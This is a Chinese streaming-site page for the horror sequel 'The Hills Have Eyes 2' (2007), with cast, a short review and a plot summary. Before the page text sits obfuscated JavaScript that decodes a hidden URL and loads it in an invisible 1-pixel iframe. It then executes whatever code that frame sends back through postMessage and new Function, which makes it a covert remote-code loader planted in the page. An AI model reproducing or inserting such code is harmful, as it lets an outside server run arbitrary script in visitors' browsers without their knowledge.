if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 
首页 » 恐怖片 » 隔山有眼2
隔山有眼2

隔山有眼2

(2007)
状态:BD1280高清中英双字版
别名:
类型:恐怖
主演:麦克·麦克米兰 杰西卡·斯特普 丹妮拉·阿隆索 迈克尔·贝利·史密斯 德里克·梅耶斯
片长:
语言:美国
时间:2020-04-28
.

《隔山有眼2》一句话点评:

山也还是那座山呦!作为系列片的续集,被害者们从一个家庭换成一小支部队,挺有新鲜感的,可见编剧还是很会揣测观众心理的。片子依旧一气呵成,看得很过瘾啊!大斧头抡起来,就往脑壳上砸!不得不说,真的是不怕再凶狠的敌人就怕猪一样的队友。首先,作为士兵,连自己的枪都失踪了。再者,居然因为出现了一个敌人,到处乱射杀,导致指挥官中弹死亡。屡教不改,后面绳子又被偷了。只能说,他们最先的确都当这一切是儿戏。结局虽然2女1男幸存,不过旁白貌似说士兵们都死了。期待第三部。

  • 剧情

  • 《隔山有眼2》是马丁·韦兹执导的一部恐怖片,由丹妮拉·阿隆索、麦克·麦克米兰等联袂主演。该片讲述的是美国国民警卫队对抗吃人魔的故事。2009.1.1看的,延续了第一部的风格,相当不错的视觉冲击力.片子里的美国大兵都很菜,连最起码的相互掩护都不会......从片子的结尾看,续集应该会很精彩!跟第一部一样的惊险,此类电影,血腥、暴力、情的画面和惊悚的配乐是不可或缺的元素!